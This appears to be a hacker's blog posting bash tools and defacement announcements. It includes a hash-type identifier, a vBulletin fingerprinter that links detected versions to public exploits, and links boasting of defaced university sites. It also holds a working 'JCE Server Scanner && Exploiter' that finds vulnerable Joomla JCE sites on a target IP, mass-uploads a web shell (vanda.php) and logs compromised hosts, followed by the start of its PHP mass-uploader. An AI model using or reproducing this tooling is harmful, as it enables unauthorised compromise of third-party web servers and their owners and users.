Kamis, 24 Desember 2015

RedH4t.Viper


The Crows Crew Hash Analyzer

The Crows Crew Hash Analyzer
  1.     
  2. #!/bin/bash  
  3. #  
  4. # ---------------------------------  
  5. # The Crows Crew Hash Analyzer    
  6. # Licence : Linux  
  7. # ---------------------------------  
  8. #  
  9. # Title   : The Crows Crew Hash Analyzer   
  10. # Code    : Bash   
  11. # Author  : RedH4t.Viper  
  12. # Email   : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com  
  13. # Date    : 2013 17 May  
  14. # Thanks  : IrIsT ,TBH ,3xp1r3 , thecrowscrew ,kurdhackteam   
  15. #  
  16. # Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf |   
  17. # Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |  
  18. # Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |  
  19. # Gr33tz  : x3o-1337 | Gabby | Sukhoi Su-37 | ARTA | H-SK33PY | (^_^) | Turk Sever |  
  20. # Gr33tz  : Sajjad13and11 | Silent | Mr.Zero | Dr.Koderz | Smartprogrammer |  
  21. # Gr33tz  : IR Anonymous | sole sad \ z3r0 | Medrik && All Of IrIsT Memebrz  
  22. #------------------------------------------------------------------------------------------#  
  23.   
  24. m_hash=$1  
  25. n_hash=${#m_hash}  
  26.   
  27.   
  28. Usage()   
  29. {  
  30.  echo ""  
  31.  echo "# ***************************************************************************​*************************#"  
  32.  echo "# Usage      : The Crows Crew Hash Analyzer <hash>                                                   *#"  
  33.  echo "# Help       : -h && --help : Show This Menu                                                         *#"  
  34.  echo "# RunScript  : Give Permision to script and run it !!                                                *#"  
  35.  echo "# ***************************************************************************​*************************#"  
  36.  echo ""  
  37. }  
  38.   
  39. # check for arguments   
  40. if [ -z "$m_hash" ] || [ "$m_hash" == "-h" ] || [ "$m_hash" == "--help" ]; then  
  41. Usage;  
  42. exit   
  43. fi   
  44.   
  45. Detect()  
  46. {  
  47.   
  48. if [ $n_hash  -eq 4 ]  
  49. then  
  50.    echo "[*] This Hash Is CRC-16 Or CRC-16-CCITT Or FCS-16 ."  
  51.   
  52. elif [ $n_hash  -eq 8 ]  
  53. then  
  54.    echo "[*] This Hash Is ADLER32 Or CRC-32 Or CRC-32B Or GHash-32-3 Or GHash-32-5 ."  
  55.   
  56. elif [ $n_hash  -eq 9 ]  
  57. then  
  58.    echo "[*] This Hash Is Elf-32 ."  
  59.   
  60. elif [ $n_hash  -eq 13 ]  
  61. then  
  62.    echo "[*] This Hash is DES (Unix) "  
  63.   
  64. elif [ $n_hash  -eq 16 ]  
  65. then  
  66.    echo "[*] This Hash is MySQL < 5"  
  67.   
  68. elif [ $n_hash  -eq 24 ]  
  69. then  
  70.    echo "[*] This Hash is RipeMD128 (Base64) Or SNEFRU128 (Base64) Or Tiger128 (Base64) Or Haval128 (Base64) Or MD2 (Base64) Or MD4(Base64) Or MD5 (Base64)"  
  71.   
  72. elif [ $n_hash  -eq 28 ]  
  73. then  
  74.    echo "[*] This Hash is Haval160 (Base64) Or RipeMD160 (Base64) Or SHA-1 (Base64) Or Tiger160 (Base64) "  
  75.   
  76. elif [ $n_hash  -eq 32 ]  
  77. then  
  78.    echo "[*] This Hash is DCC Or Haval128_3 Or Haval128_4 Or Haval128_5 Or Haval128 (HMAC) Or Haval192 (Base64) Or MD2 "   
  79.    echo "[*] Or MD2 (HMAC) Or MD4 Or MD4 (HMAC) Or MD5 Or MD5 (HMAC) Or NTLM Or RipeMD128 Or RipeMD128 (HMAC) Or SNEFRU128"   
  80.    echo "[*] Or SNEFRU128 (HMAC) Or Tiger128 Or Tiger128 (HMAC) Or Tiger192 (Base64) "  
  81.   
  82. elif [ $n_hash  -eq 34 ]  
  83. then  
  84.    echo "[*] This Hash is MD5 (Unix) "  
  85.   
  86. elif [ $n_hash  -eq 37 ]  
  87. then  
  88.    echo "[*] This Hash is MD5 (APR) "  
  89.   
  90. elif [ $n_hash  -eq 40 ]  
  91. then  
  92.    echo "[*] This Hash is Haval160 Or Haval160_3 Or Haval160_4 Or Haval160_5 Or Haval160 (HMAC) Or Haval224 (Base64) "  
  93.    echo "[*] Or MySQL v5.x Or SHA-0 Or SHA-1 Or SHA-1 (HMAC) Or SHA224 (Base64) Or Tiger160 Or Tiger160 (HMAC) Or "  
  94.   
  95. elif [ $n_hash  -eq 44 ]  
  96. then  
  97.    echo "[*] This Hash is SNEFRU256 (Base64) Or Haval256 (Base64) Or RipeMD256 (Base64) Or SHA256 (Base64) "  
  98.   
  99. elif [ $n_hash  -eq 46 ]  
  100. then  
  101.    echo "[*] This Hash is SHA-1(Django)"  
  102.   
  103.   
  104. elif [ $n_hash  -eq 48 ]  
  105. then  
  106.    echo "[*] This Hash is Tiger2 Or Tiger192 Or Tiger192 (HMAC) Or Haval192 Or Haval192_4 Or Haval195_5 Or Haval192 (HMAC) "  
  107.   
  108. elif [ $n_hash  -eq 56 ]  
  109. then  
  110.    echo "[*] This Hash is Haval224 Or Haval244_3 Or Havan244_4 Or Haval224 Or RipeMD320 (Base64) Or SHA224 Or SHA224 (HMAC) "  
  111.   
  112. elif [ $n_hash  -eq 57 ]  
  113. then  
  114.    echo "[*] This Hash is Snefru OR Gost  "  
  115.   
  116. elif [ $n_hash  -eq 64 ]  
  117. then  
  118.    echo "[*] This Hash is GOST R34.11-94 Or Haval256_5 Or Haval256 Or Haval256_3 Or Haval256_4 Or Haval256 (HMAC) Or Haval256_3  "  
  119.    echo "[*] Or RipeMD256 Or RipeMD256 (HMAC) Or SHA256 Or SHA256 (HMAC) Or SHA384 (Base64) Or SNEFRU256 Or SNEFRU256 (HMAC) Or  "  
  120.   
  121. elif [ $n_hash  -eq 96 ]  
  122. then  
  123.    echo "[*] This Hash is SHA384 (HMAC) Or SHA384 "  
  124.   
  125. elif [ $n_hash  -eq 128 ]  
  126. then  
  127.    echo "[*] This Hash is SHA512 Or SHA512 (HMAC) Or WHIRLPOO Or WHIRLPOOL (HMAC) "  
  128.   
  129. elif [ $n_hash  -eq 224 ]  
  130. then  
  131.    echo "[*] This Hash is Haval-224 "  
  132.   
  133. else  
  134.    echo "[*] The Leanth of Input Hash is Not Correct . Plz Check Your Hash Leanth"  
  135. fi  
  136. }  
  137.   
  138. Detect;    
  139. </hash>  

Tuesday, November 19, 2013

[V]bulletin Security Fingerprinter v1.0

Hi guys . [V]bulletin Security Fingerprinter v1.0


  1. #!/bin/bash  
  2. #  
  3. # VB-SFp - v1.0 [ public release ] - 240  
  4. #  
  5. #  RHH - Vbulletin Security Fingerprinter  
  6. #  
  7. # Author: Red V!per  
  8. #   Date: 2013 19 November  
  9. #    Web: www.redhathackers.org  
  10. # E-mail: beni_vanda[at]yahoo[dot]com  
  11. #  
  12. #  
  13.   
  14. TIME="0"          # sleep time among each request  
  15. CURL="/usr/bin/curl"  
  16. GREP="/bin/grep"  
  17. CUT="/usr/bin/cut"  
  18.   
  19. B="\033[1m"  
  20. N="\033[0m"  
  21. L="\033[5m"  
  22. C="\033[m"  
  23.   
  24. STRXPL="$B[+] EXPLOIT:$N"  
  25. Version=''  
  26. USER_AGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"  
  27.   
  28.   
  29.   
  30. url=$1  
  31. vbulletin=(   
  32. /archive/archive.css   
  33. /clientscript/vbulletin_ajax_htmlloader.js  
  34. /clientscript/vbulletin_ajax_imagereg.js  
  35. /clientscript/vbulletin_ajax_namesugg.js  
  36. /clientscript/vbulletin_ajax_nameverif.js  
  37. /clientscript/vbulletin_ajax_quote.js  
  38. /clientscript/vbulletin_ajax_reputation.js  
  39. /clientscript/vbulletin_ajax_search.js  
  40. /clientscript/vbulletin_ajax_taglist.js  
  41. /clientscript/vbulletin_ajax_tagsugg.js  
  42. /clientscript/vbulletin_ajax_threadrate.js  
  43. /clientscript/vbulletin_ajax_threadslist.js  
  44. /clientscript/vbulletin_ajax_userlist.js  
  45. /clientscript/vbulletin_ajax_wolresolve.js  
  46. /clientscript/vbulletin_album.js  
  47. /clientscript/vbulletin_attachment.js  
  48. /clientscript/vbulletin_backgroundpicker.js  
  49. /clientscript/vbulletin_colorpicker.js  
  50. /clientscript/vbulletin_cpcolorpicker.js  
  51. /clientscript/vbulletin_cphome_scripts.js  
  52. /clientscript/vbulletin_cpoptions_scripts.js  
  53. /clientscript/vbulletin_custom_profile.js  
  54. /clientscript/vbulletin_date_picker.css  
  55. /clientscript/vbulletin_date_picker.js  
  56. /clientscript/vbulletin_editor.css  
  57. /clientscript/vbulletin_global.js  
  58. /clientscript/vbulletin_group_read_marker.js  
  59. /clientscript/vbulletin_important.css  
  60. /clientscript/vbulletin_inlinemod.js  
  61. /clientscript/vbulletin_lightbox.js  
  62. /clientscript/vbulletin_md5.js  
  63. /clientscript/vbulletin_menu.js  
  64. /clientscript/vbulletin_multi_quote.js  
  65. /clientscript/vbulletin_notifications_nopopups.js  
  66. /clientscript/vbulletin_post_loader.js  
  67. /clientscript/vbulletin_profilefield_edit.js  
  68. /clientscript/vbulletin_quick_comment.js  
  69. /clientscript/vbulletin_quick_comment_generic.js  
  70. /clientscript/vbulletin_quick_edit_groupmessage.js  
  71. /clientscript/vbulletin_quick_edit_picturecomment.js  
  72. /clientscript/vbulletin_quick_edit_visitormessage.js  
  73. /clientscript/vbulletin_quick_reply.js  
  74. /clientscript/vbulletin_read_marker.js  
  75. /clientscript/vbulletin_settings_validate.js  
  76. /clientscript/vbulletin_tabctrl.css  
  77. /clientscript/vbulletin_tabctrl.js  
  78. /clientscript/vbulletin_tabctrl_rtl.css  
  79. /clientscript/vbulletin_templatemgr.js  
  80. /clientscript/vbulletin_textedit.js  
  81. /clientscript/vbulletin_thrdpostlist.js  
  82. /clientscript/vbulletin_quick_edit.js  
  83. /clientscript/vbulletin_quick_edit_generic.js  
  84. /cpstyles/vBulletin_2_Default/controlpanel.css  
  85. /cpstyles/vBulletin_3_Default/controlpanel.css  
  86. /cpstyles/vBulletin_3_Frontend/controlpanel.css  
  87. /cpstyles/vBulletin_3_Manual/controlpanel.css  
  88. /cpstyles/vBulletin_3_Silver/controlpanel.css  
  89. )  
  90.   
  91. Banner()  
  92. {  
  93. echo -e '\E[32m'"                                                     "; tput sgr0  
  94. echo -e '\E[32m'" __      ______    ______ _                          "; tput sgr0  
  95. echo -e '\E[32m'" \ \    / /  _ \  |  ____(_)                         "; tput sgr0  
  96. echo -e '\E[32m'"  \ \  / /| |_) | | |__   _ _ __   __ _  ___ _ __    "; tput sgr0  
  97. echo -e '\E[32m'"   \ \/ / |  _ <  |  __| | | '_ \ / _\ |/ _ \ '__|   "; tput sgr0  
  98. echo -e '\E[32m'"    \  /  | |_) | | |    | | | | | (_| |  __/ |      "; tput sgr0  
  99. echo -e '\E[32m'"     \/   |____/  |_|_   |_|_| |_|\__, |\___|_|      "; tput sgr0  
  100. echo -e '\E[32m'"            (_)     | |            __/ |             "; tput sgr0  
  101. echo -e '\E[32m'"  _ __  _ __ _ _ __ | |_ ___ _ __ |___/              "; tput sgr0  
  102. echo -e '\E[32m'" | '_ \| '__| | '_ \| __/ _ \ '__|                   "; tput sgr0  
  103. echo -e '\E[32m'" | |_) | |  | | | | | ||  __/ |                      "; tput sgr0  
  104. echo -e '\E[32m'" | .__/|_|  |_|_| |_|\__\___|_|                      "; tput sgr0  
  105. echo -e '\E[32m'" | |                                                 "; tput sgr0  
  106. echo -e '\E[32m'" |_|                                                 "; tput sgr0  
  107. echo -e   
  108. echo -e "$B         -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-       "  
  109. echo -e "         -       [V]bulletin Security Fingerprinter v1.0     -"  
  110. echo -e "-#-#-#-#-      Cod3d By: Red V!per [wWw.RedHatHackers.org]      -#-#-#-#-"  
  111. echo -e "         -                  IN GOD WE TRUST                  -"  
  112. echo -e "          -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-      $N "  
  113. echo   
  114. }  
  115.   
  116. Usage()  
  117. {  
  118. clear  
  119. echo  
  120. echo -e "$B  VB-SFp - v1.0 [public] - 240\n"  
  121. echo -e " -=============================================-\n"  
  122. echo -e "    <victim>                ->$N URL to victim installed Vbulletin"  
  123. echo -e "                               example: http://www.victim.com/vb\n"  
  124. echo -e "\n Run:$B ./VB-SFp.sh <victim> $N\n"  
  125. exit 1  
  126. }  
  127.   
  128. Check_Arguments()  
  129. {  
  130.   if [ -z "$url" ] || [ "$url" == "-h" ] || [ "$url" == "--help" ]; then  
  131.   Usage;  
  132.   exit  
  133.   fi  
  134. }  
  135.   
  136. Check_Vbulletin_Version()  
  137. {  
  138. for arr in "${vbulletin[@]}"  
  139. do  
  140.  Get_Version $arr  
  141.   
  142. if [ ! -z "$Version" ];then  
  143.   break;  
  144. fi  
  145.   
  146. done  
  147.   
  148. if [ -z "$Version" ]   
  149.  then  
  150.    echo -e "$B  [~] Not Found Version :| "  
  151.    read -p "  [~] Please Give Version Manual : " Version   
  152.    echo  
  153. fi  
  154. Fingerpirint  
  155. }  
  156.   
  157. Fingerpirint()   
  158. {  
  159. echo -e "$B  [*] Target :\e[1;35m $url \e[0m"  
  160. echo -e "$B  [*] Version :\e[1;32m $Version [Ok] \e[0m"  
  161. echo  
  162. echo -e "$B  [*] \e[1;32m Avaliable Exploits for\e[0m \e[1;35m$Version \e[0m:"   
  163. echo   
  164.   
  165. if [[ $Version == 3.8.4 ]] || [[ $Version == 3.8.5 ]] ; then  
  166.           echo -e "  $STRXPL http://1337day.com/exploit/13911     (= 3.8.4 | 3.8.5)"  
  167.           echo  
  168. fi  
  169.   
  170. if [[ $Version == 3.8.6 ]]; then  
  171.           echo -e "  $STRXPL http://1337day.com/exploit/13459     (= 3.8.6 )"  
  172.           echo  
  173. fi  
  174.   
  175. if [[ $Version == 4.0.4 ]]; then  
  176.           echo -e "  $STRXPL http://1337day.com/exploit/13743     (= 4.0.4 )"  
  177.           echo  
  178. fi  
  179.   
  180. if [[ $Version == 4.0.8 ]]; then  
  181.           echo -e "  $STRXPL http://1337day.com/exploit/14877     (= 4.0.8 )"  
  182.           echo  
  183.           echo -e "  $STRXPL http://1337day.com/exploit/14924     (= 4.0.8 PL1 )"  
  184.           echo  
  185. fi  
  186.   
  187. if [[ $Version == 3.6.8 ]] || [[ $Version == 3.7.* ]] ; then  
  188.           echo -e "  $STRXPL http://1337day.com/exploit/15531     (= 3.6.8| 3.7.x )"  
  189.           echo  
  190. fi  
  191.   
  192. if [[ $Version == 3.8.* ]]; then  
  193.           echo -e "  $STRXPL http://1337day.com/exploit/15549     (= 3.8.x )"  
  194.           echo  
  195. fi  
  196.   
  197. if [[ $Version == 3.1* ]]; then  
  198.           echo -e "  $STRXPL http://1337day.com/exploit/15822     (= 3.1x )"  
  199.           echo  
  200. fi  
  201.   
  202. res1=`expr $Version '<=' '4.1.3'`  
  203. res2=`expr $Version '>=' '4.0.*'`  
  204. if [ $res1 -eq 1 -a $res2 -eq 1 ];  
  205. then  
  206.           echo -e "  $STRXPL http://1337day.com/exploit/16548     ( 4.0.x => 4.1.3 )"  
  207.           echo  
  208. fi  
  209.   
  210. res1=`expr $Version '<=' '4.1.10'`  
  211. res2=`expr $Version '>=' '4.1.7'`  
  212. if [ $res1 -eq 1 -a $res2 -eq 1 ];  
  213. then  
  214.           echo -e "  $STRXPL http://1337day.com/exploit/17824     ( 4.1.7 => 4.1.10 )"  
  215.           echo  
  216. fi  
  217.   
  218. if [[ $Version == 3.*.* ]]; then  
  219.           echo -e "  $STRXPL http://1337day.com/exploit/18902     (= 3.x.x )"  
  220.           echo  
  221. fi  
  222.   
  223.   
  224. if [[ $Version == 4.0.* ]]; then  
  225.           echo -e "  $STRXPL http://1337day.com/exploit/16160     (= 4.0.x )"  
  226.           echo  
  227. fi  
  228.   
  229. res1=`expr $Version '<=' '4.1.2'`  
  230. res2=`expr $Version '>=' '4.0.*'`  
  231. if [ $res1 -eq 1 -a $res2 -eq 1 ];  
  232. then  
  233.           echo -e "  $STRXPL http://1337day.com/exploit/16147     ( 4.0.x => 4.1.3 )"  
  234.           echo  
  235. fi  
  236.   
  237. if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then  
  238.           echo -e "  $STRXPL http://1337day.com/exploit/11737     (= 3.8.x|4.x.x )"  
  239.           echo  
  240.           echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"  
  241.           echo  
  242. fi  
  243.   
  244. if [[ $Version == 4.0.2 ]]; then  
  245.           echo -e "  $STRXPL http://1337day.com/exploit/19293     (= 4.0.2 )"  
  246.           echo  
  247. fi  
  248.   
  249. if [[ $Version == 3.*.* ]] || [[ $Version == 4.*.* ]] ; then  
  250.           echo -e "  $STRXPL http://1337day.com/exploit/19677     (= 3.x.x|4.x.x )"  
  251.           echo  
  252. fi  
  253.   
  254. res1=`expr $Version '<=' '1.1.9'`  
  255. if [ $res1 -eq 1 ];  
  256. then  
  257.           echo -e "  $STRXPL http://1337day.com/exploit/19722     ( <= 1.1.9 )"  
  258.           echo  
  259. fi  
  260.   
  261. res1=`expr $Version '<=' '4.2.0'`  
  262. res2=`expr $Version '>=' '3.*.*'`  
  263. if [ $res1 -eq 1 -a $res2 -eq 1 ];  
  264. then  
  265.           echo -e "  $STRXPL http://1337day.com/exploit/19862     ( 3.x => 4.2.0 )"  
  266.           echo  
  267. fi  
  268.   
  269. if [[ $Version == 4.2.0 ]]; then  
  270.           echo -e "  $STRXPL http://1337day.com/exploit/19874     (= 4.2.0 )"  
  271.           echo  
  272. fi  
  273.   
  274. if [[ $Version == 5.0.0 ]]; then  
  275.           echo -e "  $STRXPL http://1337day.com/exploit/19956    (= 5.0.0 )"  
  276.           echo  
  277.           echo -e "  $STRXPL http://1337day.com/exploit/description/20002    (= 5.0.0 )"  
  278.           echo  
  279.           echo -e "  $STRXPL http://1337day.com/exploit/description/20403    (= 5.0.0 )"  
  280.           echo  
  281. fi  
  282.   
  283. if [[ $Version == 4.*.* ]] || [[ $Version == 5.*.* ]] ; then  
  284.           echo -e "  $STRXPL http://1337day.com/exploit/20983     (= 4.x.x|5.x.x )"  
  285.           echo  
  286.           echo -e "  $STRXPL http://1337day.com/exploit/description/21518     (= 4.x.x|5.x.x )"  
  287.           echo  
  288. fi  
  289.   
  290. if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then  
  291.           echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"  
  292.           echo  
  293. fi  
  294.   
  295. if [[ $Version == 4.0.* ]]; then  
  296.           echo -e "  $STRXPL http://1337day.com/exploit/21029     (= 4.0.x )"  
  297.           echo  
  298. fi  
  299.   
  300.   
  301. }  
  302.   
  303. Get_Version()   
  304. {  
  305.  req=`$CURL -silent -A $USER_AGENT "$url/$1"`   
  306.   
  307.  Version=`echo "$req" | egrep -o 'vBulletin [0-9][^b]+' | awk '{gsub("vBulletin ","")}1' |$CUT -d ' ' -f 1`  
  308. }  
  309.   
  310. Check_Arguments;  
  311. Banner  
  312. Check_Vbulletin_Version;  
Download : http://www.mediafire.com/download/58ssjy6uikt59qw/vb-fingerprinter.sh

Sunday, September 8, 2013

SAPIENZA UNIVERSITA DI ROMA WAS HACKED

http://www.th3mirror.com/mirror/id/435812/
http://zone-hc.com/archive/mirror/1e9bc13_w3.disg.uniroma1.it_mirror_.html

3CA Get Alexa Rank



insert your sites in alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh)
  1. #!/bin/bash  
  2. # 3CA Get Alexa Rank   
  3. # Usage : insert your sites in  alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh) !!  
  4. #Coded by : Red V!per  
  5.   
  6. B="\033[1m"  
  7. N="\033[0m"  
  8. L="\033[5m"  
  9. C="\033[m"  
  10.   
  11.   
  12. get_rank()  
  13. {  
  14. rm -rf alexa.php  
  15. wget -q --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" -O alexa.php "http://www.alexa.com/siteinfo/$1"  
  16. rank=`cat alexa.php | grep "Global rank" | cut -d '"' -f 5 | cut -d '>' -f 2 | cut -d '<' -f 1`  
  17.    
  18. if [ ! -z "$rank" ] ; then  
  19.    echo -e "$B[+] $1 \e[1;32m[$rank] \e[0m"  
  20.    echo "$1 [$rank]" >> alexa_rank.lst  
  21. else  
  22.    echo -e "$B[-] $1 \e[1;31m[-] \e[0m"  
  23. fi  
  24. rm -rf alexa.php  
  25. }  
  26.   
  27.   
  28. for alexa in `cat alexa.lst`  
  29. do  
  30. get_rank $alexa  
  31. done   

Estudar em Lisboa && ISEC University Hacked


Estudar em Lisboa && ISEC University Hacked

http://zone-h.org/mirror/id/20735001
http://zone-h.org/mirror/id/20735008

Tuesday, August 27, 2013

Red V!per Server Jce Scanner && Exploiter











D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4


insert jce.php beside bash script :

 
  1. #!/bin/bash  
  2. # Jce Server Scanner && Exploiter  
  3. # Coded By : Red V!per   
  4. # http://redhat-viper.blogspot.com  
  5. # Report Bugs : RedH4t.Viper@yahoo.com  
  6. # D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4  
  7. # Gr33tz   : All Turkish && Persian Hacker  
  8. #--------------------------------------------------------------------------------------------------------------------  
  9. #  
  10. # Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com   
  11. # devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org  
  12. #  
  13.   
  14.   
  15. #-------------------- Red V!per Banner ----------------------------------------------------------------------------  
  16. Banner()  
  17. {  
  18. clear   
  19. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0  
  20. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  21. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  22. echo -e '\E[34m'" ||                                                      || "; tput sgr0  
  23. echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0   
  24. echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0  
  25. echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0  
  26. echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0  
  27. echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0  
  28. echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0  
  29. echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0  
  30. echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0  
  31. echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0      
  32. echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0   
  33. echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0  
  34. echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0  
  35. echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0  
  36. echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0  
  37. echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0  
  38. echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0  
  39. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  40. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  41. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0  
  42. sleep 3  
  43. echo  
  44. echo -e "$B /\ (^_^) /\ [public] \n"  
  45. echo -e " -===============================================-\n"  
  46. echo -e "   Server Jce Scanner && Exploiter"  
  47. echo   
  48. echo -e "   BY : Red V!per\n"  
  49. echo -e " -===============================================-"  
  50. echo  
  51. echo  
  52. echo -e " -========== [         INFO         ] ===========-"  
  53. echo  
  54. read -p "[*] Target Ip : " IP  
  55. echo -e "$N"  
  56. }  
  57.   
  58. #-------------------- Variables ----------------------------------------------------------------------------  
  59.   
  60. B="\033[1m"  
  61. N="\033[0m"  
  62. L="\033[5m"  
  63. C="\033[m"  
  64.   
  65. #-------------------- Scanning Jce Targets on Server  -------------------------------------------------------  
  66.   
  67. scan_jce_on_victim()  
  68. {  
  69. page=0   
  70. how_many=1   
  71. single_page=   
  72. last_page_check=  
  73. image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"  
  74.   
  75.  while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do   
  76.     
  77. url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"   
  78.     
  79.  wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"   
  80.     
  81.  last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`   
  82.      
  83.  how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`   
  84.     
  85.  single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `   
  86.     
  87.     
  88.   cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt   
  89.   rm -f domain_bing.php   
  90.   let page=$page+1    
  91.   done   
  92.     
  93. cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt  
  94.     
  95. for domain in `cat domains.txt`   
  96.    do   
  97.      GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?  
  98.       if [ $check -eq 0 ]  
  99.          then  
  100.            echo "www.$domain" > site.lst  
  101.            php jce.php site.lst shells.lst  
  102.         GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?  
  103.         if [ $check2 -eq 0 ]  
  104.         then  
  105.         echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"  
  106.         echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"  
  107.         echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst  
  108.         else  
  109.         echo "[-] www.$domain/ [No] "  
  110.         fi     
  111.        else  
  112.          echo "[-] www.$domain/ [No] "  
  113.       fi     
  114.    done   
  115. rm -rf alldomain_bing.txt   
  116. rm -rf domains.txt   
  117. rm -rf site.lst   
  118. rm -rf shells.lst  
  119. }  
  120.   
  121. #-------------------- Remove  ------------------------------------------------------------------------  
  122. all_remove()  
  123. {  
  124.  rm -rf alldomain_bing*  
  125.  rm -rf domains_f*  
  126.  rm -rf domains_f*  
  127.  rm -rf domain_bing*   
  128.  rm -rf alldomain_bing*  
  129.  rm -rf domains*  
  130.  rm -rf jce_server*  
  131.  rm -rf site*  
  132. }  
  133.   
  134. #-------------------- Main Brain :D  ------------------------------------------------------------------------  
  135. main()  
  136. {  
  137. chmod +x jce.php   
  138.   
  139. if [ ! -f shells.lst ]; then  
  140.     touch shells.lst ;  
  141. fi  
  142.   
  143. Banner;  
  144. all_remove;  
  145. scan_jce_on_victim;  
  146. }  
  147.   
  148. main;  

jce.php  :

  1. <?php  
  2.   
  3. /* 
  4. # Mass Uploader    
  5. # Coded By Mua & Keresteci 
  6. # Recoded By Red V!per 
  7. */  
  8.   
  9.     $kirilmis = 0;  
  10.   
  11.     $taranmis = 0;  
  12.   
  13.     error_reporting(0);  
  14.   
  15.     ini_set("max_execution_time", 0);  
  16.   
  17.     ini_set("default_socket_timeout", 3);  
  18.   
  19.     function oku($link)  
  20.   
  21.     {  
  22.   
  23.         $site         = parse_url($link);  
  24.   
  25.         $link         = $site["path"];  
  26.   
  27.         $site         = $site["host"];  
  28.   
  29.         $httpresponse = "";  
  30.   
  31.         $fp           = fsockopen($site, 80, $err_num, $err_msg, 30);  
  32.   
  33.         if ($fp) {  
  34.   
  35.             fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");  
  36.   
  37.             fputs($fp, "Connection: close\n\n");  
  38.   
  39.             while (!feof($fp)) {  
  40.   
  41.                 $http_response .= fgets($fp, 128);  
  42.   
  43.             }  
  44.   
  45.             fclose($fp);  
  46.   
  47.         }  
  48.   
  49.         return $http_response;  
  50.   
  51.     }  
  52.   
  53.     $dosya      = $argv[1];  
  54.   
  55.     $kirilanlar = fopen($argv[2], 'w');  
